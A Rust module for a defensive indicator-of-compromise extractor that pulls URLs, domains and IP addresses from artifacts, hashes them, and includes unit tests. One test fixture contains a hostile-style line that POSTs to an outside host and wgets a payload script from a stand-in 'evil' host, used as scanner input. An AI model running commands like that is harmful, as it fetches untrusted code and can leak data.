use crate::lazy_pattern;
use serde::{Deserialize, Serialize};
use sha2::{Digest, Sha256};
use std::collections::BTreeSet;
use std::path::{Path, PathBuf};
// Pattern statics used by the extraction functions in this file. `lazy_pattern!`
// is a crate-local macro whose definition is not visible here; this file only
// relies on the resulting statics exposing `find_matches` and `is_match`.
// NOTE(review): presumably the regex is compiled lazily on first use — confirm
// against the macro definition.

// `http://` or `https://` followed by 3 to 512 characters that are not
// whitespace, quotes, angle brackets, backticks, braces, square brackets,
// parentheses or backslashes.
lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
// Dotted quad delimited by word boundaries. Each octet is limited to 0-255,
// but leading zeros (e.g. `010`) are accepted by the `[01]?\d?\d` branch.
lazy_pattern!(
IPV4_PATTERN,
r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
);
// Two alternatives, both delimited by word boundaries:
//   1. 1-7 hex groups each followed by `:`, then 1-7 hex groups each preceded
//      by `:` — i.e. a form that always contains `::`. The group total is NOT
//      limited to 8 by the pattern itself.
//   2. exactly 8 colon-separated hex groups (the uncompressed form).
lazy_pattern!(
IPV6_PATTERN,
r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
);
// Bare host mention: a label, at least one further `.label`, and then one of
// the listed suffixes, so a two-label name such as `foo.com` does not match
// here (such hosts are only picked up through URLs). The character classes
// are lowercase-only.
// NOTE(review): whether matching is case-insensitive depends on how
// `lazy_pattern!` builds the regex — confirm.
lazy_pattern!(
HOST_MENTION_PATTERN,
r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
);
/// Indicators of compromise collected from one or more artifacts.
///
/// Values built by `extract_from_text` and combined with `merge` are sorted
/// and free of duplicates; the fields are public, so callers that fill them
/// by hand get no such guarantee.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct ExtractedIocs {
/// URLs matched by `URL_PATTERN`, with trailing punctuation trimmed.
pub urls: Vec<String>,
/// Lowercased host names taken from URL hosts and bare host mentions.
pub domains: Vec<String>,
/// IPv4 addresses that passed the noise filter.
pub ipv4: Vec<String>,
/// IPv6 addresses that passed the plausibility check.
pub ipv6: Vec<String>,
/// Content hashes; left empty by `extract_from_text`, while
/// `extract_from_artifact` appends one entry for the artifact it is given.
pub file_hashes: Vec<FileHash>,
}
/// SHA-256 digest of an artifact's content, paired with the artifact's path.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct FileHash {
/// Path of the artifact, exactly as handed to `extract_from_artifact`.
pub path: PathBuf,
/// Lowercase hexadecimal SHA-256 of the artifact's raw bytes.
pub sha256: String,
}
impl ExtractedIocs {
pub fn is_empty(&self) -> bool {
self.urls.is_empty()
&& self.domains.is_empty()
&& self.ipv4.is_empty()
&& self.ipv6.is_empty()
&& self.file_hashes.is_empty()
}
pub fn merge(&mut self, other: ExtractedIocs) {
fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
let mut set: BTreeSet<String> = target.drain(..).collect();
set.extend(additions);
*target = set.into_iter().collect();
}
merge_sorted(&mut self.urls, other.urls);
merge_sorted(&mut self.domains, other.domains);
merge_sorted(&mut self.ipv4, other.ipv4);
merge_sorted(&mut self.ipv6, other.ipv6);
let mut seen: BTreeSet<(PathBuf, String)> = self
.file_hashes
.drain(..)
.map(|h| (h.path, h.sha256))
.collect();
for h in other.file_hashes {
seen.insert((h.path, h.sha256));
}
self.file_hashes = seen
.into_iter()
.map(|(path, sha256)| FileHash { path, sha256 })
.collect();
}
}
// Host names that are never reported as domains. `is_noise_domain` compares
// the whole name for equality, so subdomains of these entries (for example
// `evil.example.com`) are still reported.
const NOISE_DOMAINS: &[&str] = &[
"localhost",
"localhost.localdomain",
"example.com",
"example.org",
"example.net",
"test.com",
"invalid",
];
// Textual prefixes of IPv4 addresses that `is_noise_ipv4` drops (loopback,
// the unspecified address, 10/8, 192.168/16 and 169.254/16). The 172.16/12
// range cannot be expressed as a single string prefix and is handled by
// `is_rfc1918_172` instead.
const NOISE_IPV4_PREFIXES: &[&str] = &[
"127.", "0.0.0.0", "10.", "192.168.", "169.254.", ];
// Addresses that are kept even though a noise prefix covers them; checked
// before the prefix list. The tests in this file label this address `imds`.
const KEEP_SPECIAL_IPV4: &[&str] = &[
"169.254.169.254", ];
/// Upper bound on the number of distinct values that `extract_from_text`
/// collects for each indicator kind (URLs, domains, IPv4, IPv6).
pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
/// Extracts indicators from an artifact's bytes and records its SHA-256.
///
/// The content is scanned as text; bytes that are not valid UTF-8 are
/// replaced lossily for scanning only. The hash is always computed over the
/// original, unmodified bytes.
///
/// * `path` - stored verbatim in the resulting [`FileHash`].
/// * `content` - raw artifact bytes.
pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
    // `from_utf8_lossy` borrows the input when it is already valid UTF-8 and
    // only allocates a repaired copy otherwise.
    let text = String::from_utf8_lossy(content);
    let mut iocs = extract_from_text(&text);

    let hash = FileHash {
        path: path.to_path_buf(),
        sha256: sha256_hex(content),
    };
    iocs.file_hashes.push(hash);
    iocs
}
/// Scans `text` for URLs, domains, IPv4 and IPv6 addresses.
///
/// Each kind is collected into a sorted, duplicate-free list holding at most
/// [`MAX_IOCS_PER_KIND_PER_ARTIFACT`] entries. Scanning of a kind stops at
/// the first match that would exceed the cap. `file_hashes` is left empty.
pub fn extract_from_text(text: &str) -> ExtractedIocs {
    /// Adds `value` to `set` if the cap has not been reached. Otherwise logs
    /// a warning and reports `false` so the caller can stop scanning.
    fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
        let has_room = set.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT;
        if has_room {
            set.insert(value);
        } else {
            tracing::warn!(
                kind,
                cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
                "ioc_extraction: per-artifact IOC cap reached; truncating further matches"
            );
        }
        has_room
    }

    let mut urls = BTreeSet::<String>::new();
    let mut domains = BTreeSet::<String>::new();
    let mut ipv4 = BTreeSet::<String>::new();
    let mut ipv6 = BTreeSet::<String>::new();

    // URLs, plus the host of each URL when it looks like a real domain.
    for found in URL_PATTERN.find_matches(text) {
        let url = found
            .matched_text
            .as_str()
            .trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
        if !try_insert_bounded(&mut urls, url.to_string(), "url") {
            break;
        }
        let Some(host) = extract_host_from_url(url) else {
            continue;
        };
        let is_domain = !(is_noise_domain(&host) || is_ipv4(&host) || is_ipv6(&host));
        // Checking the size here keeps a full domain set from logging one
        // warning per remaining URL.
        if is_domain && domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
            try_insert_bounded(&mut domains, host, "domain");
        }
    }

    // Bare host names mentioned outside of URLs.
    for found in HOST_MENTION_PATTERN.find_matches(text) {
        let host = found.matched_text.to_ascii_lowercase();
        if is_noise_domain(&host) {
            continue;
        }
        if !try_insert_bounded(&mut domains, host, "domain") {
            break;
        }
    }

    for found in IPV4_PATTERN.find_matches(text) {
        let candidate = found.matched_text.as_str();
        if is_noise_ipv4(candidate) {
            continue;
        }
        if !try_insert_bounded(&mut ipv4, candidate.to_string(), "ipv4") {
            break;
        }
    }

    for found in IPV6_PATTERN.find_matches(text) {
        let candidate = found.matched_text;
        let accepted = candidate.matches(':').count() >= 2 && is_plausible_ipv6(&candidate);
        if accepted && !try_insert_bounded(&mut ipv6, candidate, "ipv6") {
            break;
        }
    }

    ExtractedIocs {
        urls: urls.into_iter().collect(),
        domains: domains.into_iter().collect(),
        ipv4: ipv4.into_iter().collect(),
        ipv6: ipv6.into_iter().collect(),
        file_hashes: Vec::new(),
    }
}
/// Returns the lowercased host of `url`, or `None` when `url` has no
/// `://` separator or its host part is empty.
///
/// The authority (everything between `://` and the first `/`, `?` or `#`) is
/// isolated first, and only then is userinfo removed. An `@` that appears in
/// the path, query or fragment therefore cannot be mistaken for the userinfo
/// delimiter. Ports are dropped, and a bracketed IPv6 literal is returned
/// without its brackets.
fn extract_host_from_url(url: &str) -> Option<String> {
    let (_, after_scheme) = url.split_once("://")?;

    let authority_end = after_scheme
        .find(['/', '?', '#'])
        .unwrap_or(after_scheme.len());
    let authority = &after_scheme[..authority_end];

    // Split at the LAST `@`: everything before it is userinfo, so a URL such
    // as `http://trusted.example@evil.example/` resolves to `evil.example`.
    let host_port = authority
        .rsplit_once('@')
        .map_or(authority, |(_, rest)| rest);

    let host = if host_port.starts_with('[') {
        // Bracketed IPv6 literal: keep what lies between `[` and `]`.
        host_port
            .split(']')
            .next()
            .map(|inner| inner.trim_start_matches('['))
    } else {
        host_port.split(':').next()
    };

    host.map(str::to_ascii_lowercase)
        .filter(|h| !h.is_empty())
}
/// Reports whether `domain` equals one of [`NOISE_DOMAINS`], ignoring ASCII
/// case. Only whole-name equality counts; subdomains are not noise.
fn is_noise_domain(domain: &str) -> bool {
    // Every table entry is lowercase, so a case-insensitive comparison is
    // the same as lowercasing `domain` first.
    NOISE_DOMAINS
        .iter()
        .any(|noise| domain.eq_ignore_ascii_case(noise))
}
/// Reports whether `ip` should be discarded as uninteresting.
///
/// Addresses listed in [`KEEP_SPECIAL_IPV4`] are never noise. Otherwise an
/// address is noise when it is `0.0.0.0`, starts with one of
/// [`NOISE_IPV4_PREFIXES`], or lies in 172.16.0.0/12.
fn is_noise_ipv4(ip: &str) -> bool {
    let explicitly_kept = KEEP_SPECIAL_IPV4.contains(&ip);
    if explicitly_kept {
        return false;
    }

    ip == "0.0.0.0"
        || NOISE_IPV4_PREFIXES.iter().any(|p| ip.starts_with(*p))
        || is_rfc1918_172(ip)
}
/// Reports whether `ip` belongs to the private 172.16.0.0/12 range, i.e. its
/// first octet is the literal `172` and its second octet parses to 16..=31.
fn is_rfc1918_172(ip: &str) -> bool {
    let mut octets = ip.split('.');
    match (octets.next(), octets.next()) {
        (Some("172"), Some(second)) => second
            .parse::<u8>()
            .map_or(false, |value| (16..=31).contains(&value)),
        _ => false,
    }
}
/// Reports whether `s` contains an `IPV4_PATTERN` match and has exactly
/// three dots.
fn is_ipv4(s: &str) -> bool {
    if !IPV4_PATTERN.is_match(s) {
        return false;
    }
    let dots = s.matches('.').count();
    dots == 3
}
/// Reports whether `s` has at least two colons, contains an `IPV6_PATTERN`
/// match and passes `is_plausible_ipv6`.
fn is_ipv6(s: &str) -> bool {
    let colons = s.matches(':').count();
    if colons < 2 {
        return false;
    }
    if !IPV6_PATTERN.is_match(s) {
        return false;
    }
    is_plausible_ipv6(s)
}
/// Reports whether `s` is a well-formed textual IPv6 address.
///
/// Validation is delegated to the standard-library parser. It accepts the
/// full eight-group form and the `::`-compressed form. It rejects groups
/// longer than four hex digits, more than one `::`, and strings with too
/// many groups (for example seven groups on each side of a `::`).
fn is_plausible_ipv6(s: &str) -> bool {
    s.parse::<std::net::Ipv6Addr>().is_ok()
}
/// Returns the SHA-256 digest of `bytes` as a lowercase hexadecimal string.
fn sha256_hex(bytes: &[u8]) -> String {
    let digest = Sha256::digest(bytes);
    format!("{digest:x}")
}
#[cfg(test)]
mod tests {
    use super::*;
    use std::fmt::Write;

    /// True when `list` holds an entry exactly equal to `needle`.
    fn has(list: &[String], needle: &str) -> bool {
        list.iter().any(|entry| entry == needle)
    }

    // ---- caps -----------------------------------------------------------

    #[test]
    fn extract_from_text_caps_url_count_per_artifact() {
        let total = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
        let text = (0..total).fold(String::new(), |mut acc, n| {
            let _ = writeln!(acc, "see https://example-{n}.test/ for details");
            acc
        });

        let iocs = extract_from_text(&text);
        let url_count = iocs.urls.len();
        assert!(
            url_count <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            url_count
        );
    }

    #[test]
    fn domain_cap_does_not_spam_repeated_warns() {
        let total = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
        let text = (0..total).fold(String::new(), |mut acc, n| {
            let _ = writeln!(acc, "see https://unique-{n}.example.com/");
            acc
        });

        let iocs = extract_from_text(&text);
        let domain_count = iocs.domains.len();
        let url_count = iocs.urls.len();
        assert!(
            domain_count <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "domain set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            domain_count
        );
        assert!(
            url_count <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must also be capped; got {}",
            url_count
        );
    }

    // ---- URLs and domains -------------------------------------------------

    #[test]
    fn extracts_urls_and_domains_from_script() {
        let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
        let iocs = extract_from_text(text);

        let url_with_prefix = |prefix: &str| iocs.urls.iter().any(|u| u.starts_with(prefix));
        assert!(url_with_prefix("http://sphinx.espuny.net:5000"));
        assert!(url_with_prefix("https://evil.example.com"));
        assert!(has(&iocs.domains, "sphinx.espuny.net"));
        assert!(has(&iocs.domains, "evil.example.com"));
    }

    #[test]
    fn does_not_flag_programming_identifiers_as_domains() {
        let text = "object.method.name = func.call() # not a host";
        let iocs = extract_from_text(text);
        assert!(
            iocs.domains.is_empty(),
            "got false-positive: {:?}",
            iocs.domains
        );
    }

    // ---- IPv4 ---------------------------------------------------------------

    #[test]
    fn filters_loopback_and_private_ips() {
        let text = "target = 127.0.0.1 fallback = 10.0.0.5 router = 192.168.1.1 public = 8.8.8.8 imds = 169.254.169.254";
        let iocs = extract_from_text(text);

        assert!(has(&iocs.ipv4, "8.8.8.8"));
        assert!(has(&iocs.ipv4, "169.254.169.254"));
        assert!(!has(&iocs.ipv4, "127.0.0.1"));
        assert!(!has(&iocs.ipv4, "10.0.0.5"));
        assert!(!has(&iocs.ipv4, "192.168.1.1"));
    }

    #[test]
    fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
        let inside = [
            "172.16.0.1",
            "172.17.0.1",
            "172.18.0.42",
            "172.20.5.5",
            "172.31.255.255",
        ];
        for ip in inside {
            assert!(
                is_noise_ipv4(ip),
                "172.16.0.0/12 must be filtered; failed for {ip}"
            );
        }

        let outside = ["172.15.0.1", "172.32.0.1", "172.0.0.1"];
        for ip in outside {
            assert!(
                !is_noise_ipv4(ip),
                "{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
            );
        }
    }

    #[test]
    fn extract_filters_full_rfc1918_172_12_block_e2e() {
        let text =
            "docker = 172.17.0.5 internal = 172.20.1.1 public = 9.9.9.9 edge = 172.32.0.1";
        let iocs = extract_from_text(text);

        assert!(!has(&iocs.ipv4, "172.17.0.5"));
        assert!(!has(&iocs.ipv4, "172.20.1.1"));
        assert!(has(&iocs.ipv4, "9.9.9.9"));
        assert!(has(&iocs.ipv4, "172.32.0.1"));
    }

    // ---- IPv6 ---------------------------------------------------------------

    #[test]
    fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
        let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "IPv6 must NOT match inside identifier word characters; got {:?}",
            iocs.ipv6
        );
    }

    #[test]
    fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
        let text = "session = abc1:def2:1234:5678 next";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
            iocs.ipv6
        );
    }

    #[test]
    fn ipv6_extraction_keeps_valid_addresses() {
        let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
        let iocs = extract_from_text(text);
        let found = iocs.ipv6.iter().any(|addr| addr.contains("2001:db8"));
        assert!(found, "Valid IPv6 must still match; got {:?}", iocs.ipv6);
    }

    #[test]
    fn ipv6_basic_extraction() {
        let text = "endpoint = 2001:db8::dead:beef:1";
        let iocs = extract_from_text(text);
        assert!(iocs.ipv6.iter().any(|addr| addr.contains("2001:db8")));
    }

    #[test]
    fn is_plausible_ipv6_rejects_overlong_groups() {
        let overlong = "aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222";
        assert!(!is_plausible_ipv6(overlong));
    }

    #[test]
    fn is_plausible_ipv6_accepts_compressed_form() {
        for addr in ["2001:db8::1", "fe80::1"] {
            assert!(is_plausible_ipv6(addr));
        }
    }

    #[test]
    fn is_plausible_ipv6_accepts_full_8_group_form() {
        assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
    }

    // ---- hashing, ordering, merging ---------------------------------------

    #[test]
    fn hashes_artifact_content() {
        let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
        assert_eq!(iocs.file_hashes.len(), 1);
        assert_eq!(
            iocs.file_hashes[0].sha256,
            "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
        );
    }

    #[test]
    fn deduplicates_and_sorts() {
        let text = "https://a.com/x https://a.com/y https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
        let iocs = extract_from_text(text);
        assert_eq!(iocs.ipv4, ["8.8.4.4", "8.8.8.8"]);
        assert!(iocs.urls.len() >= 2);
    }

    #[test]
    fn merge_combines_disjoint_lists() {
        let mut merged = extract_from_text("https://foo.com/x 1.1.1.1");
        let extra = extract_from_text("https://bar.io/y 8.8.8.8");
        merged.merge(extra);

        assert!(has(&merged.domains, "foo.com"));
        assert!(has(&merged.domains, "bar.io"));
        assert!(has(&merged.ipv4, "1.1.1.1"));
        assert!(has(&merged.ipv4, "8.8.8.8"));
    }
}